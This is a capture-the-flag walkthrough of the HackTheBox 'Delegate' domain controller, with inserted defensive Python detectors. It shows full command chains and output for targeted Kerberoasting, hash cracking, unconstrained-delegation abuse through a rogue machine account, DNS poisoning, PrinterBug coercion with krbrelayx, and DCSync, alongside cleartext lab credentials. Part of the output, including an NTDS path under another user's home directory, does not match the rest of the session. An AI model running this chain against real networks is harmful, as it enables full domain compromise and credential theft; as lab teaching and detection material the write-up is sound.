Initial information gathering
Initial analysis
┌──(wackymaker㉿kali)-[~/tmp/hackthebox/Delegate]
└─$ cat hostname
10.129.234.69 DC1.delegate.vl delegate.vl DC1
┌──(wackymaker㉿kali)-[~/tmp/hackthebox/Delegate]
└─$ echo domain=delegate.vl>>start.sh
┌──(wackymaker㉿kali)-[~/tmp/hackthebox/Delegate]
└─$ echo FQDN=DC1.delegate.vl>>start.sh
┌──(wackymaker㉿kali)-[~/tmp/hackthebox/Delegate]
└─$ cat start.sh
ip=10.129.234.69
domain=delegate.vl
FQDN=DC1.delegate.vl
┌──(wackymaker㉿kali)-[~/tmp/hackthebox/Delegate]
└─$ . start.sh
Port scan; judging by the open ports, this is a pure DC
┌──(wackymaker㉿kali)-[~/tmp/hackthebox/Delegate]
└─$ cat rustscan.txt
[~] The config file is expected to be at "/home/wackymaker/.rustscan.toml"
[!] File limit is lower than default batch size. Consider upping with --ulimit. May cause harm to sensitive servers
[!] Your file limit is very small, which negatively impacts RustScan's speed. Use the Docker image, or up the Ulimit with '--ulimit 5000'.
Open 10.129.234.69:53
Open 10.129.234.69:88
Open 10.129.234.69:135
Open 10.129.234.69:139
Open 10.129.234.69:389
Open 10.129.234.69:445
Open 10.129.234.69:464
Open 10.129.234.69:593
Open 10.129.234.69:636
Open 10.129.234.69:3269
Open 10.129.234.69:3268
Open 10.129.234.69:3389
Open 10.129.234.69:5985
Open 10.129.234.69:9389
Foothold
An anonymously accessible share exists
┌──(wackymaker㉿kali)-[~/tmp/hackthebox/Delegate]
└─$ nxc smb "$ip" -u guest -p '' --shares
SMB 10.129.234.69 445 DC1 [*] Windows Server 2022 Build 20348 x64 (name:DC1) (domin:delegate.vl) (signing:True) (SMBv1:False) (Null Auth:True)
SMB 10.129.234.69 445 DC1 [+] delegate.vl\guest:
SMB 10.129.234.69 445 DC1 [*] Enumerated shares
SMB 10.129.234.69 445 DC1 Share Permissions Remark
SMB 10.129.234.69 445 DC1 ----- ----------- ------
SMB 10.129.234.69 445 DC1 ADMIN$ Remote Admin
SMB 10.129.234.69 445 DC1 C$ Default share
SMB 10.129.234.69 445 DC1 IPC$ READ Remote IPC
SMB 10.129.234.69 445 DC1 NETLOGON READ Logon server share
SMB 10.129.234.69 445 DC1 SYSVOL READ Logon server share
Looking at the non-default directory NETLOGON, a sensitive script turns out to leak credentials
┌──(wackymaker㉿kali)-[~/tmp/hackthebox/Delegate]
└─$ smbclient //$ip/NETLOGON -N
Try "help" to get a list of possible commands.
smb: \> dir
. D 0 Sat Aug 26 08:45:24 2023
.. D 0 Sat Aug 26 05:45:45 2023
users.bat A 159 Sat Aug 26 08:54:29 2023
4652287 blocks of size 4096. 984341 blocks available
smb: \> get users.bat
getting file \users.bat of size 159 as users.bat (0.4 KiloBytes/sec) (average 0.4 KiloBytes/sec)
smb: \> exit
┌──(wackymaker㉿kali)-[~/tmp/hackthebox/Delegate]
└─$ cat users.bat
rem @echo off
net use * /delete /y
net use v: \\dc1\development
if %USERNAME%==A.Briggs net use h: \\fileserver\backups /user:Administrator P4ssw0rd1#123
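A defender-side check for the leak shown above, as an added example that is not part of the original write-up: it scans logon scripts in a local copy of NETLOGON/SYSVOL for `net use` lines that carry a cleartext password. The function names, the `SAMPLE` text (the users.bat content from this page) and the rule that a leftover bare word is the password are assumptions of this sketch; quoted passwords containing spaces are not handled.

```python
import os
import re

NET_USE = re.compile(r"\bnet\s+use\b(.*)", re.IGNORECASE)
SCRIPT_EXTS = (".bat", ".cmd")

def find_net_use_credentials(script_text):
    """Return one finding per `net use` line that embeds a password."""
    findings = []
    for lineno, line in enumerate(script_text.splitlines(), 1):
        m = NET_USE.search(line)          # also matches after "if ... " prefixes
        if not m:
            continue
        user = share = password = None
        for tok in m.group(1).split():
            if tok.lower().startswith("/user:"):
                user = tok[6:]
            elif tok.startswith("/"):
                continue                  # other switches: /delete, /y, ...
            elif tok.startswith("\\\\"):
                share = tok               # UNC path
            elif tok == "*" or re.fullmatch(r"[A-Za-z]:", tok):
                continue                  # drive letter, or '*' (prompt / any drive)
            else:
                password = tok            # assumption: leftover bare word = password
        if password:
            findings.append({
                "line": lineno, "share": share, "user": user,
                "password_len": len(password),   # never echo the secret itself
                "commented": line.lstrip().lower().startswith("rem"),
            })
    return findings

def scan_tree(root):
    """Scan every .bat/.cmd file under a local copy of NETLOGON/SYSVOL."""
    results = {}
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            if name.lower().endswith(SCRIPT_EXTS):
                path = os.path.join(dirpath, name)
                with open(path, encoding="latin-1") as fh:
                    hits = find_net_use_credentials(fh.read())
                if hits:
                    results[path] = hits
    return results

# Sample input: the users.bat content shown on this page.
SAMPLE = r"""rem @echo off
net use * /delete /y
net use v: \\dc1\development
if %USERNAME%==A.Briggs net use h: \\fileserver\backups /user:Administrator P4ssw0rd1#123
"""

if __name__ == "__main__":
    for hit in find_net_use_credentials(SAMPLE):
        print(hit)
```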
The credentials are valid; collect BloodHound data
┌──(wackymaker㉿kali)-[~/tmp/hackthebox/Delegate]
└─$ echo user=A.Briggs>>start.sh
┌──(wackymaker㉿kali)-[~/tmp/hackthebox/Delegate]
└─$ echo pass='P4ssw0rd1#123'>>start.sh
┌──(wackymaker㉿kali)-[~/tmp/hackthebox/Delegate]
└─$ . start.sh
┌──(wackymaker㉿kali)-[~/tmp/hackthebox/Delegate]
└─$ nxc ldap $ip -u $user -p $pass
LDAP 10.129.234.69 389 DC1 [*] Windows Server 2022 Build 20348 (name:DC1) (domain:delegate.vl) (signing:None) (channel binding:No TLS cert)
LDAP 10.129.234.69 389 DC1 [+] delegate.vl\A.Briggs:P4ssw0rd1#123
┌──(wackymaker㉿kali)-[~/tmp/hackthebox/Delegate]
└─$ bloodhound-python -d $domain -c ALL -u $user -p $pass -ns $ip --zip
INFO: BloodHound.py for BloodHound LEGACY (BloodHound 4.2 and 4.3)
INFO: Found AD domain: delegate.vl
INFO: Getting TGT for user
WARNING: Failed to get Kerberos TGT. Falling back to NTLM authentication. Error: [Errno Connection error (dc1.delegate.vl:88)] [Errno -2] Name or service not known
INFO: Connecting to LDAP server: dc1.delegate.vl
INFO: Found 1 domains
INFO: Found 1 domains in the forest
INFO: Found 1 computers
INFO: Connecting to LDAP server: dc1.delegate.vl
INFO: Found 9 users
INFO: Found 53 groups
INFO: Found 2 gpos
INFO: Found 1 ous
INFO: Found 19 containers
INFO: Found 0 trusts
INFO: Starting computer enumeration with 10 workers
INFO: Querying computer: DC1.delegate.vl
INFO: Done in 00M 17S
INFO: Compressing output into 20250921220229_bloodhound.zip
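The BloodHound permissions are simple, so I'll describe them instead of pasting a screenshot: the user we control, A.BRIGGS@DELEGATE.VL, has GenericWrite over the user N.THOMPSON@DELEGATE.VL, and that user is in the remote management group, so this should be the next step in the path. PKINIT is not configured, so go straight to targeted Kerberoasting.
First, register a service (SPN) on that account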
┌──(wackymaker㉿kali)-[~/tmp/hackthebox/Delegate]
└─$ bloodyAD -d "$domain" --host "$ip" -u "$user" -p "$pass" set object "N.THOMPSON" servicePrincipalName -v 'http/anything'
[+] N.THOMPSON's servicePrincipalName has been updated
After syncing the clock, run the Kerberoasting
┌──(wackymaker㉿kali)-[~/tmp/hackthebox/Delegate]
└─$ impacket-GetUserSPNs $domain/$user:$pass -dc-host $FQDN -dc-ip $ip -request
Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies
ServicePrincipalName Name MemberOf PasswordLastSet LastLogon Delegation
-------------------- ---------- ----------------------------------------------- -------------------------- -------------------------- ----------
http/anything N.Thompson CN=delegation admins,CN=Users,DC=delegate,DC=vl 2023-09-09 11:17:16.247262 2023-09-16 03:18:20.238500
[-] CCache file is not found. Skipping...
$krb5tgs$23$*N.Thompson$DELEGATE.VL$delegate.vl/N.Thompson*$ab77a79521321ac54700c727df347190$b5c30f649f35513d225a34e68354f7f0390e23322c84bb8f6c8c1f3b919ab5de89be685ca3ef73dd53b6c317a4e40bb............5feb2b954815b4ed179c178af25c12310fa2edfdb80f260975610aeada10c73489850734331cff27a185b7bec45fafaa0fc492d0620fc062532f39d02086ef87174eb0feb727ea633b64cd0e3c31c7f9e6256d99df5de1c1b393b88d5350b95182ea6167c263db810bc3e7e914a1c34d51ebdc11f37d20f7c36e871f6b232c120d1d2b887702c6f279b24a5a523107cd8e12cfd1828746e069f7a64d7148fad0f542e4fcbf17cb7dd5b3b6f12cfd8e4aebab39ef494acfe77a484b25f9dc40c23adbf93f4c7f4968a57cc
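Detection logic for the sequence above, as an added example that is not part of the original write-up: it pairs a Windows Security event 5136 that adds a servicePrincipalName to a user object with an event 4769 requesting an RC4 (etype 0x17) service ticket for that same account shortly afterwards. The events are constructed samples already flattened to dicts; it assumes Directory Service Changes auditing is enabled so 5136 is logged, and that the first RDN of the object DN equals the sAMAccountName.

```python
from datetime import datetime, timedelta

RC4_HMAC = "0x17"        # etype 23, as in the $krb5tgs$23$ hash above
VALUE_ADDED = "%%14674"  # 5136 OperationType "Value Added"

def find_targeted_kerberoast(events, window=timedelta(minutes=30)):
    """Pair an SPN added to a user object (5136) with an RC4 service-ticket
    request (4769) for that same account inside `window`."""
    spn_adds, alerts = [], []
    for ev in sorted(events, key=lambda e: e["time"]):
        if (ev["id"] == 5136
                and ev["AttributeLDAPDisplayName"].lower() == "serviceprincipalname"
                and ev["ObjectClass"] == "user"
                and ev["OperationType"] == VALUE_ADDED):
            # Assumption: first RDN of the DN equals the sAMAccountName.
            account = ev["ObjectDN"].split(",")[0].split("=", 1)[1].lower()
            spn_adds.append((ev["time"], account,
                             ev["SubjectUserName"].lower(), ev["AttributeValue"]))
        elif ev["id"] == 4769 and ev["TicketEncryptionType"].lower() == RC4_HMAC:
            requester = ev["TargetUserName"].split("@")[0].lower()
            for added_at, account, writer, spn in spn_adds:
                if (ev["ServiceName"].lower() == account
                        and ev["time"] - added_at <= window):
                    alerts.append({
                        "account": account, "spn": spn,
                        "writer": writer, "requester": requester,
                        "same_actor": writer == requester,
                        "delay_s": int((ev["time"] - added_at).total_seconds()),
                    })
    return alerts

T0 = datetime(2025, 9, 21, 22, 10, 0)  # constructed timestamps
USER_DN = "CN=N.Thompson,CN=Users,DC=delegate,DC=vl"  # constructed DN
SAMPLE_EVENTS = [  # constructed events, not taken from a real log
    {"id": 4769, "time": T0, "TargetUserName": "A.Briggs@DELEGATE.VL",
     "ServiceName": "DC1$", "TicketEncryptionType": "0x12"},
    {"id": 5136, "time": T0 + timedelta(seconds=30), "SubjectUserName": "A.Briggs",
     "ObjectDN": USER_DN, "ObjectClass": "user", "OperationType": VALUE_ADDED,
     "AttributeLDAPDisplayName": "description", "AttributeValue": "helpdesk"},
    {"id": 5136, "time": T0 + timedelta(seconds=60), "SubjectUserName": "A.Briggs",
     "ObjectDN": USER_DN, "ObjectClass": "user", "OperationType": VALUE_ADDED,
     "AttributeLDAPDisplayName": "servicePrincipalName",
     "AttributeValue": "http/anything"},
    {"id": 4769, "time": T0 + timedelta(seconds=100),
     "TargetUserName": "A.Briggs@DELEGATE.VL",
     "ServiceName": "N.Thompson", "TicketEncryptionType": "0x17"},
    {"id": 4769, "time": T0 + timedelta(hours=2),
     "TargetUserName": "R.Cooper@DELEGATE.VL",
     "ServiceName": "N.Thompson", "TicketEncryptionType": "0x17"},
]

if __name__ == "__main__":
    for alert in find_targeted_kerberoast(SAMPLE_EVENTS):
        print(alert)
```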
Crack the v2 hash
┌──(wackymaker㉿kali)-[~/tmp/hackthebox/Delegate]
└─$ echo '$krb5tgs$23$*N.Thompson$DELEGATE.VL$delegate.vl/N.Thompson*$ab77a79521321ac54700c727df347190$b5c30f649f35513d225a34e68354f7f0390e23322c84bb8f6c8c1f3b919ab5de89be685ca3ef73dd53b6c317a4e40bb........4a5a523107cd8e12cfd1828746e069f7a64d7148fad0f542e4fcbf17cb7dd5b3b6f12cfd8e4aebab39ef494acfe77a484b25f9dc40c23adbf93f4c7f4968a57cca76e4fffdc54dd0a80cbd8daf1888b0096a91957307cac2afd0e73c1c2a07ad4feb611ac0900fc79351df45800ebf802674fd2b76449da3f83eece2'>hash
┌──(wackymaker㉿kali)-[~/tmp/hackthebox/Delegate]
└─$ hashcat hash /usr/share/wordlists/rockyou.txt
hashcat (v6.2.6) starting in autodetect mode
OpenCL API (OpenCL 3.0 PoCL 6.0+debian Linux, None+Asserts, RELOC, SPIR-V, LLVM 18.1.8, SLEEF, DISTRO, POCL_DEBUG) - Platform #1 [The pocl project]
====================================================================================================================================================
* Device #1: cpu-sandybridge-Intel(R) Core(TM) Ultra 9 185H, 6939/13942 MB (2048 MB allocatable), 8MCU
Hash-mode was not specified with -m. Attempting to auto-detect hash mode.
The following mode was auto-detected as the only one matching your input hash:
13100 | Kerberos 5, etype 23, TGS-REP | Network Protocol
NOTE: Auto-detect is best effort. The correct hash-mode is NOT guaranteed!
Do NOT report auto-detect issues unless you are certain of the hash type.
Minimum password length supported by kernel: 0
Maximum password length supported by kernel: 256
Hashes: 1 digests; 1 unique digests, 1 unique salts
Bitmaps: 16 bits, 65536 entries, 0x0000ffff mask, 262144 bytes, 5/13 rotates
Rules: 1
Optimizers applied:
* Zero-Byte
* Not-Iterated
* Single-Hash
* Single-Salt
ATTENTION! Pure (unoptimized) backend kernels selected.
Pure kernels can crack longer passwords, but drastically reduce performance.
If you want to switch to optimized kernels, append -O to your commandline.
See the above message to find out about the exact limits.
Watchdog: Temperature abort trigger set to 90c
Host memory required for this attack: 2 MB
Dictionary cache hit:
* Filename..: /usr/share/wordlists/rockyou.txt
* Passwords.: 14344385
* Bytes.....: 139921507
* Keyspace..: 14344385
Cracking performance lower than expected?
* Append -O to the commandline.
This lowers the maximum supported password/salt length (usually down to 32).
* Append -w 3 to the commandline.
This can cause your screen to lag.
* Append -S to the commandline.
This has a drastic speed impact but can be better for specific attacks.
Typical scenarios are a small wordlist but a large ruleset.
* Update your backend API runtime / driver the right way:
https://hashcat.net/faq/wrongdriver
* Create more work items to make use of your parallelization power:
https://hashcat.net/faq/morework
$krb5tgs$23$*N.Thompson$DELEGATE.VL$delegate.vl/N.Thompson*$ab77a79521321ac54700c727df347190$b5c30f649f35513d225a34e68354f7f0390e23322c84bb8f6c8c1f3b919ab5de89be685ca3ef73dd53b6c317a4e40bb3712f1785ab2fe3e070bbf6788c035f053e6e6d51758879eb0e7199e49740aac4bba8719d312af7dffcd471a152daa3736161f15b22375e3cc0a5a48d589066b9df4a0c16e811da2fe0b4c12df8ed42fbddf1efea66e056946b2c11ac3b4e3128df00f207ab18741d1a9e5362fb4703be2c0e9bd9bae37e8be8f2ed8596c78d81c3f8388341641cf9003。。。。620fc062532f39d02086ef87174eb0feb727ea633b64cd0e3c31c7f9e6256d99df5de1c1b393b88d5350b95182ea6167c263db810bc3e7e914a1c34d51ebdc11f37d20f7c36e871f6b232c120d1d2b887702c6f279b24a5a523107cd8e12cfd1828746e069f7a64d7148fad0f542e4fcbf17cb7dd5b3b6f12cfd8e4aebab39ef494acfe77a484b25f9dc40c23adbf93f4c7f4968a57cca76e4fffdc54dd0a80cbd8daf1888b0096a91957307cac2afd0e73c1c2a07ad4feb611ac0900fc79351df45800ebf802674fd2b76449da3f83eece2:KALEB_2341
Session..........: hashcat
Status...........: Cracked
Hash.Mode........: 13100 (Kerberos 5, etype 23, TGS-REP)
Hash.Target......: $krb5tgs$23$*N.Thompson$DELEGATE.VL$delegate.vl/N.T...3eece2
Time.Started.....: Sun Sep 21 22:14:19 2025 (5 secs)
Time.Estimated...: Sun Sep 21 22:14:24 2025 (0 secs)
Kernel.Feature...: Pure Kernel
Guess.Base.......: File (/usr/share/wordlists/rockyou.txt)
Guess.Queue......: 1/1 (100.00%)
Speed.#1.........: 2302.4 kH/s (1.95ms) @ Accel:1024 Loops:1 Thr:1 Vec:8
Recovered........: 1/1 (100.00%) Digests (total), 1/1 (100.00%) Digests (new)
Progress.........: 11010048/14344385 (76.76%)
Rejected.........: 0/11010048 (0.00%)
Restore.Point....: 11001856/14344385 (76.70%)
Restore.Sub.#1...: Salt:0 Amplifier:0-1 Iteration:0-1
Candidate.Engine.: Device Generator
Candidates.#1....: KANGOL1 -> Joytjiong1
Hardware.Mon.#1..: Util: 50%
Started: Sun Sep 21 22:14:15 2025
Stopped: Sun Sep 21 22:14:26 2025
User credentials obtained; the account has WinRM access
┌──(wackymaker㉿kali)-[~/tmp/hackthebox/Delegate]
└─$ echo pass2=KALEB_2341>>start.sh
┌──(wackymaker㉿kali)-[~/tmp/hackthebox/Delegate]
└─$ echo user2=N.Thompson>>start.sh
┌──(wackymaker㉿kali)-[~/tmp/hackthebox/Delegate]
└─$ . start.sh
┌──(wackymaker㉿kali)-[~/tmp/hackthebox/Delegate]
└─$ nxc winrm $ip -u $user2 -p $pass2
WINRM 10.129.234.69 5985 DC1 [*] Windows Server 2022 Build 20348 (name:DC1) (domain:delegate.vl)
WINRM 10.129.234.69 5985 DC1 [+] delegate.vl\N.Thompson:KALEB_2341 (Pwn3d!)
After logging in, user.txt is obtained; I won't show it here
Privilege escalation
This user holds special privileges
evil-winrm-py PS C:\Users\N.Thompson\Documents> whoami /priv
PRIVILEGES INFORMATION
----------------------
Privilege Name Description State
============================= ============================================================== =======
SeMachineAccountPrivilege Add workstations to domain Enabled
SeChangeNotifyPrivilege Bypass traverse checking Enabled
SeEnableDelegationPrivilege Enable computer and user accounts to be trusted for delegation Enabled
SeIncreaseWorkingSetPrivilege Increase a process working set Enabled
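I analyzed the SeEnableDelegationPrivilege privilege on my blog yesterday, and the technique is recorded in 血缇之书
First test whether unconstrained delegation can be set up (check the right to create machine accounts)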
┌──(wackymaker㉿kali)-[~/tmp/hackthebox/Delegate]
└─$ nxc ldap $ip -u $user2 -p $pass2 -M maq
/home/wackymaker/.local/share/pipx/venvs/netexec/lib/python3.13/site-packages/masky/lib/smb.py:6: UserWarning: pkg_resources is deprecated as an API. See https://setuptools.pypa.io/en/latest/pkg_resources.html. The pkg_resources package is slated for removal as early as 2025-11-30. Refrain from using this package or pin to Setuptools<81.
from pkg_resources import resource_filename
LDAP 10.129.234.69 389 DC1 [*] Windows Server 2022 Build 20348 (name:DC1) (domain:delegate.vl) (signing:None) (channel binding:No TLS cert)
LDAP 10.129.234.69 389 DC1 [+] delegate.vl\N.Thompson:KALEB_2341
MAQ 10.129.234.69 389 DC1 [*] Getting the MachineAccountQuota
MAQ 10.129.234.69 389 DC1 MachineAccountQuota: 10
The coercion trigger needed for the relay also works
┌──(wackymaker㉿kali)-[~/tmp/hackthebox/Delegate]
└─$ nxc smb $ip -u $user2 -p $pass2 -M coerce_plus
/home/wackymaker/.local/share/pipx/venvs/netexec/lib/python3.13/site-packages/masky/lib/smb.py:6: UserWarning: pkg_resources is deprecated as an API. See https://setuptools.pypa.io/en/latest/pkg_resources.html. The pkg_resources package is slated for removal as early as 2025-11-30. Refrain from using this package or pin to Setuptools<81.
from pkg_resources import resource_filename
SMB 10.129.234.69 445 DC1 [*] Windows Server 2022 Build 20348 x64 (name:DC1) (domin:delegate.vl) (signing:True) (SMBv1:False) (Null Auth:True)
SMB 10.129.234.69 445 DC1 [+] delegate.vl\N.Thompson:KALEB_2341
COERCE_PLUS 10.129.234.69 445 DC1 VULNERABLE, DFSCoerce
COERCE_PLUS 10.129.234.69 445 DC1 VULNERABLE, PetitPotam
COERCE_PLUS 10.129.234.69 445 DC1 VULNERABLE, PrinterBug
COERCE_PLUS 10.129.234.69 445 DC1 VULNERABLE, PrinterBug
COERCE_PLUS 10.129.234.69 445 DC1 VULNERABLE, MSEven
Create a machine account and convert its password to a hash for the next step
┌──(wackymaker㉿kali)-[~/tmp/hackthebox/Delegate]
└─$ impacket-addcomputer -computer-name FS01 -computer-pass 'wackwack1$' -dc-ip $ip $domain/$user2:$pass2
Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies
[*] Successfully added machine account FS01$ with password wackwack1$.
┌──(wackymaker㉿kali)-[~/tmp/hackthebox/Delegate]
└─$ iconv -f ASCII -t UTF-16LE <(printf 'wackwack1$') | openssl dgst -md4
MD4(stdin)= 58826d80a57b1527e373616eec499b06
Modify the DNS record of the created machine account so it points to our Kali host
┌──(wackymaker㉿kali)-[~/tools/ad-tools/krbrelayx/krbrelayx-master]
└─$ python3 dnstool.py -u 'delegate.vl\FS01$' -p 'wackwack1$' --action add --record FS01.delegate.vl --data 10.10.16.23 --type A -dns-ip 10.129.6.221 DC1.delegate.vl
[-] Connecting to host...
[-] Binding to host
[+] Bind OK
[-] Adding new record
[+] LDAP operation completed successfully
Configure the SPN
┌──(wackymaker㉿kali)-[~/tools/ad-tools/krbrelayx/krbrelayx-master]
└─$ python3 addspn.py -u 'delegate.vl\FS01$' -p 'wackwack1$' -s 'cifs/FS01.delegate.vl' -t FS01$ -dc-ip 10.129.6.221 DC1.delegate.vl --additional
[-] Connecting to host...
[-] Binding to host
[+] Bind OK
[+] Found modification target
[+] SPN Modified successfully
┌──(wackymaker㉿kali)-[~/tools/ad-tools/krbrelayx/krbrelayx-master]
└─$ python3 addspn.py -u 'delegate.vl\FS01$' -p 'wackwack1$' -s 'cifs/FS01.delegate.vl' -t FS01$ -dc-ip 10.129.6.221 DC1.delegate.vl
[-] Connecting to host...
[-] Binding to host
[+] Bind OK
[+] Found modification target
[+] SPN Modified successfully
Use bloodyAD to configure unconstrained delegation
┌──(wackymaker㉿kali)-[~/tmp/hackthebox/Delegate]
└─$ bloodyAD -d $domain -u $user2 -p $pass2 --host $FQDN add uac 'FS01$' -f TRUSTED_FOR_DELEGATION
[-] ['TRUSTED_FOR_DELEGATION'] property flags added to FS01$'s userAccountControl
Start the relay listener
┌──(wackymaker㉿kali)-[~/tools/ad-tools/krbrelayx/krbrelayx-master]
└─$ python3 krbrelayx.py -hashes :58826d80a57b1527e373616eec499b06
/home/wackymaker/tools/ad-tools/krbrelayx/krbrelayx-master/lib/servers/smbrelayserver.py:429: SyntaxWarning: invalid escape sequence '\%'
LOG.error("Authenticating against %s://%s as %s\%s FAILED" % (
/home/wackymaker/tools/ad-tools/krbrelayx/krbrelayx-master/lib/servers/smbrelayserver.py:441: SyntaxWarning: invalid escape sequence '\%'
LOG.info("Authenticating against %s://%s as %s\%s SUCCEED" % (
/home/wackymaker/tools/ad-tools/krbrelayx/krbrelayx-master/lib/servers/smbrelayserver.py:516: SyntaxWarning: invalid escape sequence '\%'
LOG.info("Authenticating against %s://%s as %s\%s SUCCEED" % (
[*] Protocol Client LDAP loaded..
[*] Protocol Client LDAPS loaded..
[*] Protocol Client HTTPS loaded..
[*] Protocol Client HTTP loaded..
[*] Protocol Client SMB loaded..
[*] Running in export mode (all tickets will be saved to disk). Works with unconstrained delegation attack only.
[*] Running in unconstrained delegation abuse mode using the specified credentials.
[*] Setting up SMB Server
[*] Setting up HTTP Server on port 80
[*] Setting up DNS Server
[*] Servers started, waiting for connections
In another terminal, trigger one of the working coerced authentications
┌──(wackymaker㉿kali)-[~/tmp/hackthebox/Delegate]
└─$ nxc smb $ip -u "FS01$" -p 'wackwack1$' -M coerce_plus -o LISTENER=FS01.$domain METHOD=PrinterBug
/home/wackymaker/.local/share/pipx/venvs/netexec/lib/python3.13/site-packages/masky/lib/smb.py:6: UserWarning: pkg_resources is deprecated as an API. See https://setuptools.pypa.io/en/latest/pkg_resources.html. The pkg_resources package is slated for removal as early as 2025-11-30. Refrain from using this package or pin to Setuptools<81.
from pkg_resources import resource_filename
SMB 10.129.6.221 445 DC1 [*] Windows Server 2022 Build 20348 x64 (name:DC1) (domin:delegate.vl) (signing:True) (SMBv1:False) (Null Auth:True)
SMB 10.129.6.221 445 DC1 [+] delegate.vl\FS01$:wackwack1$
COERCE_PLUS 10.129.6.221 445 DC1 VULNERABLE, PrinterBug
COERCE_PLUS 10.129.6.221 445 DC1 Exploit Success, spoolss\RpcRemoteFindFirstPrinterChangeNotificationEx
After a successful trigger, the listener shows output
[*] Servers started, waiting for connections
[*] SMBD: Received connection from 10.129.3.28
[*] Got ticket for DC1$@DELEGATE.VL [krbtgt@DELEGATE.VL]
[*] Saving ticket in DC1$@DELEGATE.VL_krbtgt@DELEGATE.VL.ccache
[*] SMBD: Received connection from 10.129.3.28
[-] Unsupported MechType 'NTLMSSP - Microsoft NTLM Security Support Provider'
[*] SMBD: Received connection from 10.129.3.28
[-] Unsupported MechType 'NTLMSSP - Microsoft NTLM Security Support Provider'
The TGT is captured successfully
Use the ticket directly to DCSync and obtain the administrator hash
KRB5CCNAME=DC1\$@DELEGATE.VL_krbtgt@DELEGATE.VL.ccache netexec smb dc1.delegate.vl --use-kcache --ntds
SMB dc1.delegate.vl 445 DC1 [*] Windows Server 2022 Build 20348 x64 (name:DC1) (domain:delegate.vl) (signing:True) (SMBv1:False) (Null Auth:True) (Guest Auth:True)
SMB dc1.delegate.vl 445 DC1 [+] DELEGATE.VL\DC1$ from ccache
SMB dc1.delegate.vl 445 DC1 [-] RemoteOperations failed: DCERPC Runtime Error: code: 0x5 - rpc_s_access_denied
SMB dc1.delegate.vl 445 DC1 [+] Dumping the NTDS, this could take a while so go grab a redbull...
SMB dc1.delegate.vl 445 DC1 [+] Dumped 11 NTDS hashes to /home/oxdf/.nxc/logs/ntds/dc1.delegate.vl_None_2025-09-12_133554.ntds of which 8 were added to the database
SMB dc1.delegate.vl 445 DC1 [*] To extract only enabled accounts from the output file, run the following command:
SMB dc1.delegate.vl 445 DC1 [*] cat /home/oxdf/.nxc/logs/ntds/dc1.delegate.vl_None_2025-09-12_133554.ntds | grep
After that, just log in with the hash
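An audit for the three conditions the privilege-escalation steps above relied on, as an added example that is not part of the original write-up: a non-DC computer account with TRUSTED_FOR_DELEGATION set, a MachineAccountQuota above zero, and SeEnableDelegationPrivilege granted to someone other than Administrators. The input is a constructed LDAP export plus a constructed `[Privilege Rights]` section of the Default Domain Controllers Policy GptTmpl.inf; the domain SID, the RID 1121, WS02$ and the function name are placeholders, and mS-DS-CreatorSID is assumed to be already converted to string form.

```python
TRUSTED_FOR_DELEGATION = 0x80000  # userAccountControl bit: unconstrained delegation
SERVER_TRUST_ACCOUNT = 0x2000     # userAccountControl bit: domain controller account
ADMINISTRATORS = "S-1-5-32-544"   # default holder of SeEnableDelegationPrivilege on DCs

def audit_delegation(accounts, machine_account_quota, gpt_tmpl_text):
    """Return (kind, subject, detail) tuples for delegation-related exposure."""
    findings = []
    for acct in accounts:
        uac = int(acct["userAccountControl"])
        # DCs carry TRUSTED_FOR_DELEGATION by design; anything else is a finding.
        if uac & TRUSTED_FOR_DELEGATION and not uac & SERVER_TRUST_ACCOUNT:
            creator = acct.get("mS-DS-CreatorSID")  # set when a user joined it via quota
            origin = f"joined via quota by {creator}" if creator else "no creator SID"
            findings.append(("unconstrained-delegation", acct["sAMAccountName"], origin))
    if machine_account_quota > 0:
        findings.append(("machine-account-quota", str(machine_account_quota),
                         "holders of SeMachineAccountPrivilege can add computers"))
    for line in gpt_tmpl_text.splitlines():
        key, _, value = line.partition("=")
        if key.strip() != "SeEnableDelegationPrivilege":
            continue
        for sid in (s.strip().lstrip("*") for s in value.split(",")):
            if sid and sid != ADMINISTRATORS:
                findings.append(("delegation-privilege", sid, "non-default holder"))
    return findings

DOMAIN_SID = "S-1-5-21-1111111111-2222222222-3333333333"  # constructed placeholder
SAMPLE_ACCOUNTS = [  # constructed export; DC1$ and FS01$ are the names on this page
    {"sAMAccountName": "DC1$", "userAccountControl": 532480},   # 0x82000
    {"sAMAccountName": "FS01$", "userAccountControl": 528384,   # 0x81000
     "mS-DS-CreatorSID": f"{DOMAIN_SID}-1108"},
    {"sAMAccountName": "WS02$", "userAccountControl": 4096},    # constructed, benign
]
SAMPLE_GPT_TMPL = f"""[Privilege Rights]
SeMachineAccountPrivilege = *S-1-5-11
SeEnableDelegationPrivilege = *S-1-5-32-544,*{DOMAIN_SID}-1121
"""

if __name__ == "__main__":
    # MachineAccountQuota of 10 is the value reported on this page.
    for finding in audit_delegation(SAMPLE_ACCOUNTS, 10, SAMPLE_GPT_TMPL):
        print(finding)
```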